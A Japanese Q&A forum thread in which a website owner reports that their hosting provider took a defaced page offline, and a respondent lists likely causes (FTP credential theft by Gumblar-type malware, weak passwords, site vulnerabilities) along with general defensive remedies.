• 締切済み

セキュリティホールを突いた改竄

セキュリティホールを突いた改竄 コアサーバーに契約してます。 今まで普通にアップロードできていたのですが、突然下記のメールが来ました。 早速ですが、お使いのアカウント内で規約違反ページが公開されております。 www.○○○.com おそらくお使いのサイト内のセキュリティホールを突いた改竄であると思われます。 一旦こちらで非公開設定にさせていただきました。 ご確認の上、よろしくご理解、ご対応いただければと存じます。 いったいなぜ・・・。 どうやったら解決できるのか、初めてのことなのでご意見を伺いたいと思いました。 サイトが止まってしまうと、困るのです・・・。 コアサーバーさんからは返事待ちです。 どうぞよろしくお願いいたします。

みんなの回答

noname#116115
noname#116115
回答No.1

情報が足りないので推測です。 1.ガンブラー系のウイルスに感染した  現象 FTPアカウントを乗っ取られページ内にウイルスの感染コードが追加された。  原因 管理用端末がウイルスに感染するとFTPの通信を監視され、アカウントとパスワードを取得される。  対策 管理用端末のウイルスチェック、Windows Updateの実施、FTPアカウントのパスワード変更、     サイトのウイルスの除去(すべてのページを確認する必要があります。) 2.パスワード推測による乗っ取り  現象 なんでもあり  原因 よくあるパスワードを使用しており、第三者が簡単に修正できるようになっていた。  対策 パスワードを複雑なものに変更、サイトの全データの入れ替え 3.サイトそのものの脆弱性を付いた攻撃  想定される状況が多岐に渡るのでコアサーバーさんの回答待ちですね。